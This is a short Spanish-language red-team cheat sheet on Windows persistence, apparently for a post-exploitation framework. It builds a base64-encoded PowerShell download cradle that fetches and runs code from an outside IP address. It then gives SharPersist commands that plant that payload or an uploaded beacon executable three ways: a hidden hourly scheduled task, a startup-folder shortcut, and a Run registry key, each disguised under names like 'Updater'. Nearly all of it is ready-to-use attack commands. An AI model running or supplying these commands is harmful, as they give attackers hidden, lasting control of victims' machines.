Persistence
Generar payload para crear persistencia.
str='IEX ((new-object net.webclient).downloadstring("http://192.168.147.129/a"))'
echo -en $str | iconv -t UTF-16LE | base64 -w 0$str = 'IEX ((new-object net.webclient).downloadstring("http://192.168.147.129/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))Utilizar SharPersist para crear la persistencia.
execute-assembly C:\Tools\SharPersist.exeTask Scheduler
Crea una tarea que se ejecuta cada cierto tiempo.
execute-assembly C:\Tools\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFg...<SNIP>...gApACkA" -n "Updater" -m add -o hourly-t Tecnica de persistencia-c Commando a ejecutar-a Argumento para el comando-n Nombre de la task-m Agregar / eliminar / listar la task-o Frecuencia de la task
Startup Folder
Genera un archivo lnk y se ejecuta cuando se reinicia la maquina o se da clic al archivo.
execute-assembly C:\Tools\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFg...<SNIP>...gApACkA" -f "UserEnvSetup" -m addf Nombre del archivo
Registry AutoRun
Creamos un payload y lo subimos a la maquina victima.
cd C:\ProgramData
upload C:\Tools\Payloads\beacon_x64.exe
mv beacon_x64.exe updater.exeCrea un registro y se ejecuta cuando se reinicia la maquina.
execute-assembly C:\Tools\SharPersist.exe -t reg -c "C:\ProgramData\updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add